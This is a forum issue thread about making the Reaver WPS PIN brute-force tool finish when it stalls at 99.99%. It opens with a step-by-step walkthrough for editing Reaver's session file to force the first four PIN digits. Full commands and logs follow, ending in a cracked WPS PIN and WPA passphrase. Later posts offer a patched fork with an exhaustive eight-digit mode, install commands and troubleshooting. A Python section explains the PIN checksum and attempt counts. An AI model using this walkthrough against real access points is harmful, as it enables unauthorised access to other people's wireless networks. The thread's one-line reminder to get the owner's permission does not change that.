The Reaver scan stops working, getting stuck at 9x.xx% or 99.99%. Sometimes it repeats the same pin in a loop and gets a WSC error.

I don't know how and why these problems occur. Maybe a little bug in reaver, or the AP changes the pin in the meantime.
But after a little research and some close tests I managed to find the solution to these problems. It works fine every time these errors happen.

First of all you have to be 100% sure that the following things are OK:

*** The first 4 digits of the pin. (THIS IS MOST IMPORTANT. I'll show at the end of the post how to know if it is really true.)

*** Fair/Good strength and quality of AP signal


My Case:
>>ESSID: TP_LINK-PSC
>>BSSID: F4:C3:F6:01:BD:1A
>>CHANNEL: 2
>>PIN First 4 DIGITS: 9104

Let's begin:
     1---You need to locate the reaver work directory; there will be a file named “bssid of AP”.wpc and reaver.db

In my case:
/usr/local/etc/reaver/  Make a backup of this directory and erase those two files:
F4C3F601BD1A.wcs and reaver.db

    2----Set the Wi-Fi card in monitor mode on the same channel as the target AP

    3----Now start a new reaver scan: reaver  -i “interface” -b  “bssid” -e “essid” -t "time to wait M5/7" -c “channel” -vv -n
In my case the input was:
reaver  -i mon0 -b F4:C3:F6:01:BD:1A -e TP-LINK -t 0.9 -c 11 -vv -n 
Then press enter; you should see something like this:

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching mon0 to channel 2
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 12345670


(Note: you SHOULD NOT see the Restore question yet. If you do, something is wrong: stop and check that you are in the right directory. You can use the command locate reaver.db to find the right one.)

After the THIRD pin check, stop the scan with CTRL+C (^C).
In my case the third was 01230153

[+] Trying pin 01230153
^C
[+] Nothing done, nothing to save.


-----4----Now comes the trick. In the reaver work folder open the "essid".wpc file and you will see there is one column with multiple lines,
each line with 4 numbers. These numbers are the sequence that reaver will follow to find the first four numbers of the pin.
 So edit it and change the 3333 to your four digits.
In my case:
cat F4C3F601BD1A.wcs
2
0
0
1234
0000
0123
1111
2222
3333   >  change to your first 4 pin numbers
4444

    then
2
0
0
1234
0000
0123
1111
2222
9104
4444

 Save and run reaver again.
This time WE WANT to restore the previous scan

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>


[+] Switching mon0 to channel 2
[?] Restore previous session for F4:C3:F6:01:BD:1A? [n/Y] y
[+] Restored Previous Session
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 11110718
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending....
      ..... WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2013-05-29 09:59:08 (11 seconds/pin)
[+] Trying pin 91040004
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message     > (If you receive the M5, it indicates that you have the right first 4 digits.)
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040008
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.19% complete @ 2013-05-29 09:59:44 (11 seconds/pin)
[+] Trying pin 91040010
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040017

Wait and you will see the count jump to 90.00% with no bug anymore, and this time reaver will try every possible combination.

after +-2 hours
........
[+] Trying pin 91040893
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message  > (DONE!!!)
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1092 seconds
[+] WPS PIN: '91040893'
[+] WPA PSK: 'xxxxxxxxxxxxx'
[+] AP SSID: 'TP-LINK'


* To ensure that you have the right first 4 digits, you need to check two things:

First, you have to be able to receive the M5 message; this indicates that the first half of the pin is right.
Second, when you set the pin, the percentage should get to 90%.

Hope it works for you guys like it worked for me. If you still get stuck, do it all over again; that happened to me when the signal was weak.
You can try this before or after Stefano's solution.
 That's it, good luck.
And remember to only test APs with the permission of the owner.  :)
Jun 18, 2013
#52 c.sala....@gmail.com
Hi,

Some months ago I jumped directly into this issue and, after seeing some of the comments here, I went directly into downloading the code and fixing the issue.

At the moment I have a completely functional version with the following features:

1. Fixed the 99.9% never ending loop: If the end is reached without success, the application exits as expected. (before it continued until it was interrupted or killed)
2. Added an exhaustive option (--exhaustive, -X) which uses "set_p1(p1_index) + set_p1(p2_index)" instead of "set_p1(p1_index) + set_p2(p2_index)" to force covering all possible combinations. This ensures that the PIN is found even if it does not follow the "checksum" rules. However, this of course makes the process much longer.
3. If the -X option is not provided, the application runs as usual. However, if it reaches the end without having found a valid PIN, it gets the first half of the PIN which has been already found and restarts scanning for the second one in exhaustive mode. This makes the overall process much longer in the worst scenarios, but this ensures that the PIN is finally found in all cases (if the signal is strong enough).
4. Added two options: (--p1-index, -1) and (--p2-index, -2) which allow setting an initial value for the respective indexes. Useful if you lost a previous session.
5. Added some "aesthetic" improvements, such as displaying the elapsed time and the estimated remaining time in AdBhCmDs format, or displaying each time the Pin counter and the Max Pin attempts (in verbose mode).


And, here you have a snapshot of the new output, making use of the new "-2" option as an example, including the instant in which the mode changes from "checksum" to "exhaustive" (notice how the "Max pin attempts" increases to 20000 and how Pin count goes down to 10001) and displaying the elapsed and remaining time:

# reaver -i mon0 -c 6 -b XX:XX:XX:XX:XX:XX -v -S -t7 -d 10 -p 4247 -2 998

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Starting Cracking Session. Pin count: 10998, Max pin attempts: 11000
[+] Trying pin 42479970.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 42479987.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 42471234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 42470000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 42470123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 42471111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d0h1m18s.
[+] Trying pin 42472222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] Trying pin 42473333.
[+] Pin count advanced: 10006. Max pin attempts: 20000
[+] Trying pin 42474444.
[+] Pin count advanced: 10007. Max pin attempts: 20000
[+] Trying pin 42475555.
[+] Pin count advanced: 10008. Max pin attempts: 20000
[+] Trying pin 42476666.
[+] Pin count advanced: 10009. Max pin attempts: 20000
[+] 50.04% complete. Elapsed time: 0d0h2m22s.
[+] Estimated Remaining time: 1d9h18m12s
[+] Trying pin 42477777.
[+] Pin count advanced: 10010. Max pin attempts: 20000


The weird thing about all this is that I already sent two messages to the project owners asking for commit permissions to upload my patch and I got absolutely NO response from them. At all!

I am not a big friend of the "forking" concept, but man, it's been more than one year since the last signs of life from the committers, and it's a pity to have such a useful project just abandoned when there are plenty of issues and volunteers to solve them!
May we think about it?
Jun 23, 2013
#53 erhance...@gmail.com
carles, in case you don't get a response from the original developers, can you share your source code changes here? It seems like you created a better version and there is no need to reinvent the wheel.
Jun 29, 2013
#54 c.sala....@gmail.com
Hi,

I received several requests about those modifications, so I made them public in pastebin: http://pastebin.com/EcWw7e7n

Here you have the instructions to install the changes in linux:
- Download a fresh version of the code (revision 113).
- go to this link: http://pastebin.com/EcWw7e7n
- Paste the contents into a patch file inside the trunk folder (let's say, reaver-wps.patch)
- execute the following command from inside the trunk folder (without quotes): "patch -p1 < reaver-wps.patch"
- follow the reaver build and installation instructions as usual.

If you have any issues, please feel free to send me an e-mail and I'll try to give you a hand.

Regards,
Carles
Jul 2, 2013
#55 Lamonafi...@gmail.com
Hi! Great work Carles.sala. It would be interesting if you could make a mod with your changes so that lazy noobs like me who don't know anything about programming could install the reaver mod instead of doing all that annoying work! You could upload it to rapidshare or similar.

Thanks in advance.

 
Jul 2, 2013
#56 saeed.y2...@gmail.com
Yeah, I agree with Lamonafi,
I would really appreciate it if you did that.

Jul 6, 2013
#57 c.sala....@gmail.com
Hi,

Some of you reported having problems with the patch (apparently pastebin modifies slightly the pasted text (white spaces and so on) and then patch does not pick up the changes as expected).

Therefore, I finally opted for creating a fork repository (http://code.google.com/p/reaver-wps-fork/) where this issue is already fixed.

I still didn't have time to prepare and upload the binaries, but the version is ready to download and install.

Here you have the steps which you can just copy/paste (run as root!):

NOTE: If you are running ubuntu, make sure you have libsqlite3-dev installed:
# apt-get install libsqlite3-dev

# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-only
# cd reaver-wps-fork-read-only/src
# ./configure
# make distclean && ./configure #(you can skip this step if you never installed reaver before)
# make
# make install

If you have any doubts, or you want to contribute in the project with your own changes, please feel free to contact me.

Regards,
Carles
Jul 8, 2013
#59 Lamonafi...@gmail.com
Hi c.sala! I tested your program today; it works fine but sessions can't be saved. What command should I use if I want to start the pin count at 5267 3000, for example? (I know the first 4 digits.)
Thanks.
Jul 24, 2013
#60 J0J0...@gmail.com
I installed the patch "patch -p1 < reaver-wps.patch" and now reaver doesn't compile at all. How do I uninstall?
Aug 1, 2013
#63 rbel...@gmail.com
I installed the patch, this is the output


[+] Waiting for beacon from XX:C6:XX:62:F2:XX
[+] Associated with XX:C6:XX:62:F2:XX (ESSID: xxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 12340002.
[+] Pin count advanced: 10002. Max pin attempts: 11000
[+] Trying pin 12342228.
[+] Pin count advanced: 10003. Max pin attempts: 11000
[+] Trying pin 12343331.
[+] Pin count advanced: 10004. Max pin attempts: 11000
[+] Trying pin 12344444.
[+] Pin count advanced: 10005. Max pin attempts: 11000
[+] 90.95% complete. Elapsed time: 0d0h1m9s.
[+] Trying pin 12345557.
[+] Pin count advanced: 10006. Max pin attempts: 11000
[+] Trying pin 12346660.
[+] Pin count advanced: 10007. Max pin attempts: 11000
[+] Trying pin 12347773.
[+] Pin count advanced: 10008. Max pin attempts: 11000
[+] Trying pin 12348886.
[+] Pin count advanced: 10009. Max pin attempts: 11000
[+] Trying pin 12349999.
[+] Pin count advanced: 10010. Max pin attempts: 11000
[+] 91.00% complete. Elapsed time: 0d0h2m7s.
[+] Estimated Remaining time: 0d3h1m30s
[+] Trying pin 12340019.
[+] Pin count advanced: 10011. Max pin attempts: 11000
[+] Trying pin 12340026.
[+] Pin count advanced: 10012. Max pin attempts: 11000
[+] Trying pin 12340033.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12340033.
[+] Pin count advanced: 10013. Max pin attempts: 11000
[+] Trying pin 12340040.
[+] Pin count advanced: 10014. Max pin attempts: 11000
[+] 91.04% complete. Elapsed time: 0d0h3m5s.
[+] Estimated Remaining time: 0d3h50m4s
[+] Trying pin 12340057.
[+] Pin count advanced: 10015. Max pin attempts: 11000
[+] Trying pin 12340064.
[+] Pin count advanced: 10016. Max pin attempts: 11000
[+] Trying pin 12340071.
[+] Pin count advanced: 10017. Max pin attempts: 11000
[+] Trying pin 12340088.
[+] Pin count advanced: 10018. Max pin attempts: 11000
[+] Trying pin 12340095.
[+] Pin count advanced: 10019. Max pin attempts: 11000
[+] 91.08% complete. Elapsed time: 0d0h4m3s.
[+] Estimated Remaining time: 0d2h59m51s
[+] Trying pin 12340101.
[+] Pin count advanced: 10020. Max pin attempts: 11000
[+] Trying pin 12340118.
[+] Pin count advanced: 10021. Max pin attempts: 11000
[+] Trying pin 12340125.
[+] Pin count advanced: 10022. Max pin attempts: 11000
[+] Trying pin 12340132.
[+] Pin count advanced: 10023. Max pin attempts: 11000
[+] Trying pin 12340149.
[+] Pin count advanced: 10024. Max pin attempts: 11000
[+] 91.13% complete. Elapsed time: 0d0h5m2s.
[+] Estimated Remaining time: 0d2h58m56s
[+] Trying pin 12340156.
[+] Pin count advanced: 10025. Max pin attempts: 11000
[+] Trying pin 12340163.
[+] Pin count advanced: 10026. Max pin attempts: 11000
[+] Trying pin 12340170.
[+] Pin count advanced: 10027. Max pin attempts: 11000
[+] Trying pin 12340187.
[+] Pin count advanced: 10028. Max pin attempts: 11000
[+] Trying pin 12340194.
[+] Pin count advanced: 10029. Max pin attempts: 11000
[+] 91.17% complete. Elapsed time: 0d0h5m59s.
[+] Estimated Remaining time: 0d2h58m1s
[+] Trying pin 12340200.
[+] Pin count advanced: 10030. Max pin attempts: 11000
[+] Trying pin 12340217.
[+] Pin count advanced: 10031. Max pin attempts: 11000
[+] Trying pin 12340224.
[+] Pin count advanced: 10032. Max pin attempts: 11000
[+] Trying pin 12340231.
[+] Pin count advanced: 10033. Max pin attempts: 11000
[+] Trying pin 12340248.
[+] Pin count advanced: 10034. Max pin attempts: 11000
[+] 91.22% complete. Elapsed time: 0d0h6m57s.
[+] Estimated Remaining time: 0d2h57m6s

waiting for reaver to finish
Aug 2, 2013
#64 rbel...@gmail.com
[+] Trying pin 12349975.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 12349982.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] 100.00% complete. Elapsed time: 0d3h26m13s.
[+] Estimated Remaining time: 0d3h26m13s
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 12341234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 12340000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 12340123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 12341111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] Trying pin 12342222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d3h27m29s.
[+] Estimated Remaining time: 0d3h27m29s


Why does it restart at 50%?
Aug 3, 2013
#67 c.sala....@gmail.com
Hi,

#60 and #62: I already said in my comment #57 that the patch was messed up by pastebin and that it didn't work as expected.
Please checkout the version from reaver-wps-fork project (http://reaver-wps-fork.googlecode.com/svn/trunk/), which does compile properly.

#64: I explained that in comment #52. The 99.99% problem appeared because the WPS pin which you are trying to crack does not follow the checksum rule.
Therefore, in the new version of reaver-wps, when it reaches the end of the checksum pins it assumes that yours is "non standard" and jumps automatically to the exhaustive mode, which brute forces all 8 digits instead of brute forcing 7 of them and calculating the last one using a checksum.

This has two big consequences:
On one side, chances of matching the pin increase dramatically.
However, on the other side, the crack time for one of those non-standard pins can be several days instead of several hours (bear in mind that, before, this kind of pin could not be cracked at all using reaver "as-was").

I hope this clears up your doubts.
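The checksum rule and the two "Max pin attempts" values discussed in comments #52, #64 and #67, worked through as an added example (not code from Reaver or from the fork). The check-digit routine is the standard WPS one; the function names are made up here, and the progress formula is an assumption inferred from the percentages printed in the outputs above.

```python
# Added illustration; function names are hypothetical, not Reaver's.

def wps_checksum_digit(first7: int) -> int:
    """Return the check digit for the first seven digits of a WPS PIN."""
    if not 0 <= first7 <= 9_999_999:
        raise ValueError("expected at most seven decimal digits")
    accum = 0
    while first7:
        accum += 3 * (first7 % 10)  # 1st, 3rd, 5th, 7th digit from the right: weight 3
        first7 //= 10
        accum += first7 % 10        # 2nd, 4th, 6th digit from the right: weight 1
        first7 //= 10
    return (10 - accum % 10) % 10


def follows_checksum_rule(pin: str) -> bool:
    """True if the eighth digit is the checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        raise ValueError("a WPS PIN is exactly eight decimal digits")
    return wps_checksum_digit(int(pin[:7])) == int(pin[7])


def max_pin_attempts(exhaustive: bool) -> int:
    """Upper bound on guesses when the two PIN halves are confirmed separately.

    First half: 10^4 candidates. Second half: 10^3 if the last digit is
    derived from the checksum, 10^4 if all four digits are free.
    """
    first_half = 10 ** 4
    second_half = 10 ** 4 if exhaustive else 10 ** 3
    return first_half + second_half


def percent_complete(pin_count: int, exhaustive: bool) -> float:
    """Progress as pin_count / max attempts (assumed from the thread's output)."""
    return round(100 * pin_count / max_pin_attempts(exhaustive), 2)


# PINs copied from the outputs quoted in this thread.
THREAD_PINS = ["12345670", "91040893", "12349982", "42479970",
               "42471234", "42470000", "12341234"]


def classify(pins):
    """Map each PIN to whether it obeys the checksum rule."""
    return {pin: follows_checksum_rule(pin) for pin in pins}


if __name__ == "__main__":
    for pin, ok in classify(THREAD_PINS).items():
        print(pin, "checksum OK" if ok else "only reachable in exhaustive mode")
    # The same pin count is a different fraction of each search space, which
    # is why the counter drops from 100% to about 50% on the mode switch.
    print(percent_complete(10005, exhaustive=False), "% of", max_pin_attempts(False))
    print(percent_complete(10004, exhaustive=True), "% of", max_pin_attempts(True))
```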
Aug 9, 2013
#70 sairesea...@gmail.com
Thank you Carles,

I do not have Internet at home, making installation of this patch impossible.

Can you wrap it up and upload it somewhere?

Again thank you!
Aug 12, 2013
#71 ohnostra...@gmail.com
Hi c.sala! Can you please make it possible for reaver to save changes and restart the same session? Pls pls, can you do this?

Thanks for the great job!
Aug 12, 2013
#72 sairesea...@gmail.com
How do I install this patch onto a live USB installation?

root@kali:~# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-only

Checked out revision 3.
root@kali:~# 
root@kali:~# cd reaver-wps-fork-read-only/src
root@kali:~/reaver-wps-fork-read-only/src# ./configure
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables... 
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for pcap_open_live in -lpcap... no
error: pcap library not found!
root@kali:~/reaver-wps-fork-read-only/src#
Aug 13, 2013
#73 sairesea...@gmail.com
How do I install this without an Internet connection?
Aug 16, 2013
#74 lord.bla...@gmail.com
Hi Carles. First, thanks for doing the patched version!

Downloaded & installed it (v3) as per http://code.google.com/p/reaver-wps-fork/ Runs fine for a bit, but then throws 'Floating point exception' after a percent-complete line, see cmdline & output below. Any ideas? Let me know if more info would help.

reaver -i mon0 -b 55:66:77:88:99:AA -vv -c 1 -d 4 -t 10 -x 305 -S  -p 8983 -X -2 19
...
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 50.23% complete. Elapsed time: 0d0h8m5s.
Floating point exception




Aug 17, 2013
#75 sairesea...@gmail.com
same as #74


[+] Trying pin 12343126.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 93.82% complete. Elapsed time: 0d0h2m33s.
Floating point exception

Aug 17, 2013
#76 sairesea...@gmail.com
syntax was...

reaver -i mon0 -c 11 -b BC:76:70:E0:71:EC -vv -p 1234 -2 310
Aug 18, 2013
#77 lord.bla...@gmail.com
OK, a bit more info to add to #74:
1. The floating point error is fairly rare, what's more common is to simply stop without error (or answer).
2. The problem only happens immediately after the "% complete. Elapsed time: " line.
3. The problem seems to happen only after multiple WPS transaction fails.
Hope that helps!
Aug 20, 2013
#78 sairesea...@gmail.com
Yes, I agree with #77 that the Floating point exception is a rare thing and happens only (in my case) within the first minute of a session. The last time it did it, the syntax was very simple and without any new arguments (reaver -i mon0 -c 11 -b BC:76:70:XX:XX:XX -vv).

Getting back to the 99% bug... The following may or may not be related.

Reaver 1.4 has problems with certain routers, namely Huawei routers (BSSID BC:76:70: ...)

1. It does not detect the first correct four numbers of the PIN, instead giving a false positive with 1234, or any four digits you give it, and returns the "received M5 message".

2. The first problem causes the 99% bug and repeats the last key at the end.

Solution: Reaver 1.3

With a very simple syntax in reaver 1.3 (reaver -i mon0 -c 11 -b BC:76:70:DD:0A:28 -vv) I retrieved the information! I did EVERYTHING spending DAYS trying with reaver 1.4 and this version (1.4 fork r3) without any success.

@ Carles

any chance for you to include a '-3' argument in the next version? 
-3 as in 'operate like reaver 1.3'


Aug 24, 2013
#81 dave...@gmail.com
Hi Carles, "Floating point exception" here too.
Aug 29, 2013
#82 ushpacor...@gmail.com
I have the same problem here, and it seems to happen only after multiple WPS transaction fails; it just stops without an answer. I'm now trying with reaver 1.3, which seems to be working fine.
Aug 30, 2013
#83 ushpacor...@gmail.com
Hello, as I said before, reaver 1.3 is working but I still have the 99.99% problem because the first 4 numbers are independent from the others; it is arbitrary and is not among the numbers that reaver tries for the second half. I'm basically where I started: now reaver actually gets the true first four numbers (no M5 false positive) but gets stuck at 99.99%, and the fork isn't working either. Does anyone know how to solve the 99% loop?

Aug 30, 2013
#84 brock1...@gmail.com
I've personally had this problem both with my Alfa 802.11 g/n (the g/n unit
came with my Reaver Pro) and an older Alfa 802.11 b/g USB device (RTL8187).
However my Intel Centrino Ultimate-n 6300 has no problems on the same
laptop. I've also noticed that all three cards can connect to any of their
compatible access point standards, can send deauth packets but the Alfa's
cannot capture hand shakes using fern, wifite or even manually using tshark
or cowpatty (cowpatty just produces empty files). Not sure if that helps
give insight in to the 99.99% problem or not. To be clear, the Alfa's will
only make it to 99.99% but the Intel will work every time. (Backtrack 5r3,
Kali)
Today (2 hours ago)
#85 c.sala....@gmail.com
Hi all,

Sorry for not responding to your comments (which I really appreciate), but it has been a while since I last came to this thread and I still hadn't seen them.

@Chris: I'm glad to see that you managed to install it without internet; however, I cannot give a solution for the 1.3 idea. For sure it could be done, but I suspect it would be a hard thing to implement, and probably not as worthwhile as just looking forward and fixing the current issues. Anyway, I will take the 1.3 version as a reference when trying to fix them.

@Steven and the others with the "Floating point Exception" error: There's already an issue created in the fork repo: http://code.google.com/p/reaver-wps-fork/issues/detail?id=1
Would you mind following the issue there and uploading any relevant info? I must say that I have had little time to work on it, and actually I could not manage to reproduce the error with any of my routers, but I'll do what I can to fix it.

@Mali: Sure, I will try to fix this. Would you mind creating an issue for it in the new repo?
Then it will be easier to follow up.

Regards,
Carles 